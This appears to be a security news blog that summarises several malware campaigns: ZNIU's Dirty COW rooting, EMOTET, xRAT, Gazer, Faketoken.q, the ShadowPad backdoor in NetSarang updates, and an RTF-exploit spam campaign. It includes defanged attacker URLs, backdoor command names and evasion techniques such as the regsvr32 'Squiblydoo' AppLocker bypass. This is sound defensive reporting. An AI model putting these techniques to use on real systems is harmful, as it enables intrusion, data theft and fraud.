Android Malware ZNIU exploits DirtyCow to gain root privileges

Nearly a year after the disclosure of the Dirty COW vulnerability that affected the Linux kernel, cybercriminals have started exploiting the vulnerability against Android users.

Publicly disclosed last year in October, Dirty COW was present in a section of the Linux kernel—a part of virtually every Linux distribution, including Red Hat, Debian, and Ubuntu—for years and was actively exploited in the wild.

The vulnerability allows an unprivileged local attacker to gain root access through a race condition issue, gain access to read-only root-owned executable files, and permit remote attacks.

Security researchers from Trend Micro published a blog post on Monday disclosing that the privilege escalation vulnerability (CVE-2016-5195), known as Dirty COW, has now been actively exploited by a malware sample of ZNIU, detected as AndroidOS_ZNIU.

The ZNIU malware was detected in more than 40 countries last month, with the majority of the victims found in China and India. The malware was also detected in the U.S., Japan, Canada, Germany, and Indonesia. As of this writing, more than 5,000 affected users have been detected.

The malware uses the Dirty COW exploit to root Android devices via the copy-on-write (COW) mechanism in Android’s Linux kernel and install a backdoor which can then be used by attackers to collect data and generate profit through a premium rate phone number.

ZNIU’s leveraging of Dirty COW only works on Android devices with ARM/X86 64-bit architecture. However, this recent exploit can bypass SELinux and plant a root backdoor, while the PoC can only modify the service code of the system.

INFECTION CHAIN

The ZNIU malware often appears as a porn app downloaded from malicious websites, where users are tricked into clicking on a malicious URL that installs the malware-carrying app on their device. Once launched, ZNIU will communicate with its C&C server. If an update to its code is available, it retrieves it from the C&C server and loads it into the system. Simultaneously, the Dirty COW exploit will be used to provide local privilege escalation to overcome system restrictions and plant a backdoor for potential remote control attacks in the future.

Figure_2_ZNIU_infection_chain

After entering the main UI of the device, the malware will harvest the carrier information of the user. It then transacts with the carrier through an SMS-enabled payment service, allowing the malware operator to pose as the device owner. Through the victim’s mobile device, the operator behind ZNIU will collect money through the carrier’s payment service. In one of the samples, in its code the payments were directed to a dummy company, which, based on network traffic, was located in a city in China. When the SMS transaction is over, the malware will delete the messages from the device, leaving no sign of the transaction between the carrier and the malware operator. If the carrier is outside China, there will be no possible SMS transaction with the carrier, but the malware will still exploit the system to plant a backdoor.

The main logic of ZNIU’s native code works as follows:

1. Collect the model information of the device.

2. Fetch appropriate rootkits from the remote server.

3. Decrypt the exploits.

4. Trigger exploits one by one, check the result, and remove exploit files.

5. Report if the exploit succeeded or failed.

The researchers found the malware has already infected more than 5,000 Android users across 40 countries in recent weeks, with the majority of victims found in China and India, while other resides in the United States, Japan, Canada, Germany and Indonesia.

Google has released an update for Android that, among other fixes, officially fixes the Dirty COW vulnerability. The tech giant also confirmed that its Play Protect now protects Android users against this malware.

The easiest way to prevent yourself from being targeted by such clever malware is to avoid downloading apps from third-party sources and always stick to the official Google Play Store.

Advertisements

EMOTET spreading through spam botnet

The banking malware EMOTET which was first detected in 2014 is back.Researchers at trend micro have discovered a spam campaign targeting all sectors and industries unlike it’s previous variant.

The United States, United Kingdom, and Canada made up the bulk of the target regions, with the US taking up 58% of all our detected infections, while Great Britain and Canada were at 12% and 8% respectively.

EMOTET-1.jpg

These new variants use multiple ways to spread. Its primary propagation method involves the use of a spam botnet, which results in its rapid distribution via email. EMOTET can also spread via a network propagation module that brute forces its way into an account domain using a dictionary attack. EMOTET’s use of compromised URLs as C&C servers likely helped it spread as well.

For a malware with email-spamming and lateral-movement capabilities, infecting business systems and acquiring corporate e-mails translates to larger and more effective spam targeting and a higher chance of gaining information.

EMOTET-2.jpg

The new EMOTET variants initially arrive as spam claiming to be an invoice or payment notification to trick its victims into believing that this is a legitimate email from a supplier.

In the body of this email is a malicious URL that will download a document containing a malicious macro when a user clicks on it. This macro will then execute a PowerShell command line that is responsible for downloading EMOTET.

Once downloaded, EMOTET drops and executes copies of itself into the following folders:

  • If EMOTET has no admin privileges, it will drop the copies into %AppDataLocal%\Microsoft\Windows\{string 1}{string 2}.exe
  • If EMOTET contains admin privileges, it will instead drop the copies into System%\{string 1}{string 2}.exe

The malware will attempt to ease its entry into the system by deleting the Zone Identifier Alternate Data Stream (ADS), which is a string of information that describes the Internet Explorer Trust Settings of the file’s download source. This is one way for the system to find out if a downloaded file is from a high-risk source, blocking the download if it is detected as such.

EMOTET will then register itself as a system service and adds registry entries to ensure that it is automatically executed at every system startup. The typical windows service acts as a “controller” for most hardware-based applications, while others are used to control other applications. The EMOTET malware, on the other hand, uses it for both Elevation of Privilege, and as an autostart mechanism.

EMOTET will list the system’s currently running processes and then proceed to gather information on both the system itself and the operating system used.

It will then connect to the Command & Control (C&C) servers to update to its latest version, as well as to determine the type of payload that it will deliver. One of the possible payloads is the persistent banking trojan known as DRIDEX, which attempts to harvest banking account information via browser monitoring routines. Furthermore, the malware can also turn the infected system into part of a botnet that sends spam emails intended to spread the malware even further. This allows the trojan to spread quickly, as the more systems it can potentially infect, the faster it will propagate. The malware is also capable of harvesting email information and stealing username and password information found in installed browsers

We discovered that in addition to the above payloads, the C&C server is responsible for sending modules that will perform the following routines, which includes:

  • SPAMMING Module
  • Network Worm Module
  • Mail Password Viewer
  • Web Browser Password Viewer

PREVENTION & MITIGATION

Preventing this malware to infect your machine requires the usual security measures like do not download attachments from unknown email attachments and sources alongwith not clicking on links that are not trusted and always use a good AV solution.

 

xRAT – A new sophisticated malware

Researchers at Lookout have identified a mobile trojan called xRAT with extensive data collection functionality and the ability to remotely run a suicide function to avoid detection. The malware is associated with the high-profile Xsser / mRAT malware, which made headlines after targeting both iOS and Android devices of pro-democracy Hong Kong activists in late 2014.

xRAT has many similarities with mRAT, it has the same structure and uses the same decryption key. The analysis of the code revealed that both malware uses the same naming conventions that suggest both malicious codes were developed by the same threat actor.

According to researchers from security firm Lookout, the command and control (C&C) servers used for the xRAT malware is the same of a Windows malware,  a circumstance that suggests the threat actor is composed of experienced experts.

xrat-malware.png

xRAT supports an impressive set of capabilities that include flexible reconnaissance and information gathering, detection evasion, specific checks for antivirus, app and file deletion functionality.It also searches for data belonging to popular communications apps like QQ and WeChat.

Listed below are the types of data gathered by xRAT and features that enable it to perform reconnaissance, run remote code, and exfiltrate data from Android devices:

  • Browser history
  • Device metadata (such as model, manufacturer, SIM number, and device ID)
  • Text messages
  • Contacts
  • Call logs
  • Data from QQ and WeChat
  • Wifi access points a device has connected to and the associated passwords
  • Email database and any email account username / passwords
  • Device geolocation
  • Installed apps, identifying both user and system applications
  • SIM Card information
  • Provide a remote attacker with a shell
  • Download attacker specified files and save them to specified locations
  • Delete attacker specified files or recursively delete specified directories
  • Enable airplane mode
  • List all files and directories on external storage
  • List the contents of attacker specified directories
  • Automatically retrieve files that are of an attacker specified type that are between a minimum and maximum size
  • Search external storage for a file with a specific MD5 hash and, if identified, retrieve it
  • Upload attacker specified files to C2 infrastructure
  • Make a call out to an attacker specified number
  • Record audio and write it directly to an already established command and control network socket
  • Executes attacker specified command as the root user
  • Downloads a 22MB trojanized version of QQ from hiapk[.]com, saving it to /sdcard/.wx/wx.apk. Referred to as ‘rapid flow mode’.

 To avoid detection, the xRAT implements a “suicide” function that could be triggered to clean the installation on the infected mobile device.

The developers behind xRAT created an alert system, flagging to the malware operator if any of the following antivirus applications are present on a compromised device.

  • 管家 (housekeeper)
  • 安全 (safety)
  • 权限 (Authority)
  • 卫士 (Guardian)
  • 清理 (Cleanup)
  • 杀毒 (Antivirus)
  • Defender
  • Security

xRAT can be remotely instructed to perform a wide range of deletion operations, such as removing large portions of a device or attacker-specified files like images from certain directories on the SDCard, all apps and data from /data/data/, and all system apps from /system/app/.

Most of the C&C infrastructure used by xRAT in the past were based in China, but sample recently analyzed by the company were located in the United States.

As anticipated, the C&C infrastructure also controlled a Windows malware, the experts also noticed a malicious executable named MyExam, this means that “the actors behind this family may be continuing to target students, similar to how attackers used mRAT during the protests in 2014.”

Gazer:A backdoor targeting Ministries and Embassies

ESET security researchers have discovered a new malware campaign targeting consulates, ministries and embassies and is believed to be carried out by Turla advanced persistent threat (APT) hacking group.

Active since 2016, the malware campaign is leveraging a new backdoor, dubbed Gazer,written in C++, the backdoor delivers via spear phishing emails and hijacks targeted computers.

The attacks show all the hallmarks of past campaigns launched by the Turla hacking group, namely:

  • Targeted organizations are embassies and ministries;
  • Spearphishing delivers a first-stage backdoor such as Skipper;
  • A second stealthier backdoor (Gazer in this instance, but past examples have included Carbon and Kazuar) is put in place;
  • The second-stage backdoor receives encrypted instructions from the gang via C&C servers and evades detection by using compromised using compromised, legitimate websites as a proxy.
Instead of using Windows Crypto API, Gazer uses custom 3DES and RSA encryption libraries to encrypt the data before sending it to the C&C server—a common tactic employed by the Turla APT group.

Gazer uses code-injection technique to take control of a machine and hide itself for a long period of time in an attempt to steal information.

Gazer backdoor also has the ability to forward commands received by one infected endpoint to the other infected machines on the same network.
So far ESET researchers have identified four different variants of the Gazer malware in the wild.
Earlier versions of Gazer were signed with a valid certificate issued by Comodo for “Solid Loop Ltd,” while the latest version is signed with an SSL certificate issued to “Ultimate Computer Support Ltd.”
ssl-certificate
Certificates used to sign the malware variants

According to researchers, Gazer has already managed to infect a number of targets worldwide, with the most victims being located in Europe.

Full technical analysis of the malware can be found here.

Android Trojan now targeting other non-banking apps

Security researchers at Kaspersky Lab have discovered a new variant of the Android banking Trojan called Faketoken that now has capabilities to detect and record an infected device’s calls and display overlays on top of taxi booking apps to steal banking information.

Dubbed Faketoken.q, the new variant of mobile banking trojan is being distributed using bulk SMS messages as their attack vector, prompting users to download an image file that actually downloads the malware.

The mobile Trojan that we examined consists of two parts. The first part is an obfuscated dropper (verdict: Trojan-Banker.AndroidOS.Fyec.az): files like this are usually obfuscated on the server side in order to resist detection. At first glance, it may seem that its code is gibberish.

However, this is code works quite well. It decrypts and launches the second part of the malware. This is standard practice these days, whereas unpacked Trojans are very rare.

The second part of the malware, which is a file with DAT extensions, contains the malware’s main features. The data becomes encrypted.

By decrypting the data, it is possible to obtain a rather legible code.

After the Trojan initiates, it hides its shortcut icon and starts to monitor all of the calls and whichever apps the user launches. Upon receiving a call from (or making a call to) a certain phone number, the malware begins to record the conversation and sends it to evildoers shortly after the conversation ends.

android-banking-trojan

The authors of Faketoken.q kept the overlay features and simplified them considerably. So, the Trojan is capable of overlaying several banking and miscellaneous applications, such as Android Pay, Google Play Store, and apps for paying traffic tickets and booking flights, hotel rooms, and taxis.

Faketoken.q monitors active apps and, as soon as the user launches a specific one, it substitutes its UI with a fake one, prompting the victim to enter his or her bank card data. The substitution happens instantaneously, and the colors of the fake UI correspond to those of the original launched app.

Since fraudsters require an SMS code sent by the bank to authorise a transaction, the malware steals incoming SMS message codes and forward them to the attackers command-and-control (C&C) server for a successful attack.

According to the researchers, Faketoken.q has been designed to target Russian-speaking users, as it uses the Russian language on the user interface.

PREVENTION & MITIGATION

The easiest way to prevent yourself being a victim of such mobile banking Trojans is to avoid downloading apps via links provided in messages or emails, or any third-party app store.

You can also go to Settings → Security and make sure “Unknown sources” option is turned off in order to block installation of apps from unknown sources.

Most importantly, verify app permissions before installing apps, even if it is downloaded from official Google Play. If you find any app asking more than what it is meant for, just do not install it.

It’s always a good idea to install an antivirus app from a reputed vendor that can detect and block such malware before it can infect your device, and always keep your system and apps up-to-date.

ShadowPad backdoor spreads through software update

Kaspersky lab discovered that attackers were able to modify the NetSarang software update to include a malware tracked as shadowpad backdoor.

Founded in 1997, NetSarang Computer, Inc. develops, markets and supports secure connectivity solutions and specializes in the development of server management tools for large corporate networks.

In July, researchers at Kaspersky Lab were investigating suspicious DNS requests in a partner’s network. The requests were found on systems used to process transactions in a customer’s network in the financial industry.

Further investigation into the DNS queries led them to NetSarang, that promptly sanitized its software update process by removing the malicious library nssock2.dll in its update package,

“In July 2017, during an investigation, suspicious DNS requests were identified in a partner’s network. The partner, which is a financial institution, discovered the requests originating on systems involved in the processing of financial transactions.” states the analysis published by Kaspersky.

The analysis showed that recent versions of software produced and distributed by NetSarang had been surreptitiously modified to include an encrypted payload that could be remotely activated by a knowledgeable attacker.

The backdoor was embedded into one of the code libraries used by the software (nssock2.dll):

170815-shadowpad-1
Disposition of the NSSOCK2.DLL binary with embedded malicious code

The attackers hid their malicious intent in several layers of encrypted code. The tiered architecture prevents the actual business logics of the backdoor from being activated until a special packet is received from the first tier command and control (C&C) server (“activation C&C server”). Until then, it only transfers basic information, including the computer, domain and user names, every 8 hours.

Activation of the payload would be triggered via a specially crafted DNS TXT record for a specific domain. The domain name is generated based on the current month and year values, e.g. for August 2017 the domain name used would be “nylalobghyhirgh.com”.

170815-shadowpad-2
Only when triggered by the first layer of C&C servers does the backdoor activate its second stage

The module performs a quick exchange with the controlling DNS server and provides basic target information (domain and user name, system date, network configuration) to the server. The C&C DNS server in return sends back the decryption key for the next stage of the code, effectively activating the backdoor.

analysis indicates the embedded code acts as a modular backdoor platform. It can download and execute arbitrary code provided from the C&C server, as well as maintain a virtual file system (VFS) inside the registry. The VFS, and any additional files created by the code, are encrypted and stored in a location unique to each victim.

Kaspersky Lab revealed that the first known compile date for the ShadowPad backdoor is Jul 13, hackers signed the malicious code with a legitimate NetSarang certificate.

 Kaspersky confirmed activated payload in a company in Hong Kong. Given that the NetSarang programs are used in hundreds of critical networks around the world, on servers and workstations belonging to system administrators, it is strongly recommended that companies take immediate action to identify and contain the compromised software.

Kaspersky published the list of Indicators of Compromise to help companies to check their systems.

 

Malicious Email campaign targets Russian-Speaking companies

A malicious email campaign against Russian-speaking enterprises is employing a combination of exploits and Windows components to deliver a new backdoor that allows attackers to take over the affected system. The attack abuses various legitimate Windows components to run unauthorized scripts; this is meant to make detection and blocking more challenging, particularly by whitelisting-based solutions.

The campaign was discovered by Trend Micro that has been active for last 2 months and is targeting Russian-speaking firms.

The hackers leverage on many exploits and Windows components to run malicious scripts to avoid detection. The last sample associated with this attack was uploaded to VirusTotal on June 6, 2017 and experts at Trend Micro observed five spam campaigns running from June 23 to July 27, 2017.

201708-backdoor-email-1

The phishing messages are designed to appear as if they were sent from sales and billing departments and contain a weaponized Rich Text Format (RTF) file that exploits the CVE-2017-0199 flaw in Microsoft Office’s Windows Object Linking and Embedding (OLE) interface.

Their limited distribution and specificity in social engineering lures are red flags that may indicate they are a spear-phishing campaign.

Once the exploit code is executed, it downloads a fake Excel XLS file embedded with malicious JavaScript. When opened, the Excel header is ignored and the file is treated as an HTML Application file by the Windows component mshta.exe.

“The exploit code downloads what is supposedly an XLS file from  hxxps://wecloud[.]biz/m11[.]xls. This domain, to which all of the URLs used by this attack point to, is controlled by the attacker and was registered in early July.” states the analysis publiahed by Trend Micro.

“This fake Excel spreadsheet file is embedded with malicious JavaScript. The Excel header will actually be ignored and the file will be treated as an HTML Application file by mshta.exe, the Windows component that handles/opens HTA or HTML files.”

The JavaScript code calls the odbcconf.exe normal executable to run the DLL. Once executed, the DLL drops a SCT file (Windows scriptlet) in the %APPDATA% folder and appends the .TXT extension to it.

The DLL calls is used to power a Squiblydoo attack that leverages the Regsvr32 (Microsoft Register Server) to bypass restrictions on running scripts and evade application whitelisting protections such as AppLocker.

“This particular command uses the Regsvr32 (Microsoft Register Server) command-line utility, which is normally used to register and unregister OLE controls in the Windows registry, including DLL files. This attack method is also known as Squiblydoo—Regsvr32 is abused to bypass restrictions on running scripts.” continues the analysis. “It also means evading application white-listing protections such as AppLocker. While Squiblydoo is already a known attack vector, this is the first time we’ve seen it combined with odbcconf.exe.”

Next, the real backdoor is downloaded and executed, it is an XML file that is downloaded from the domain wecloud[.]biz. Also in this case, it is executed exploiting the same Regsvr32-abusing Squiblydoo attack technique.

The analysis states that “This is another SCT file with obfuscated JavaScript code that contains backdoor commands, which essentially allow attackers to take over an infected system.It tries to connect to it’s C&C server at hxxps://wecloud[.]biz/mail/ajax[.]php and retrieve tasks to carry out, some of which are:

  • d&exec = download and execute PE file
  • gtfo = delete files/startup entries and terminate
  • more_eggs = download additional/new scripts
  • more_onion = run new script and terminate current script
  • more_power = run command shell commands”

While the later stages of the infection chain required the use of various Windows components, the entry point still involves the use of a Microsoft Office exploit. Patching and keeping software up-to-date will protect users. Alternately, employing firewalls, intrusion detection and prevention systems, virtual patching, and URL categorization, as well as enforcing robust patch management policies, will significantly reduce the system’s attack surface.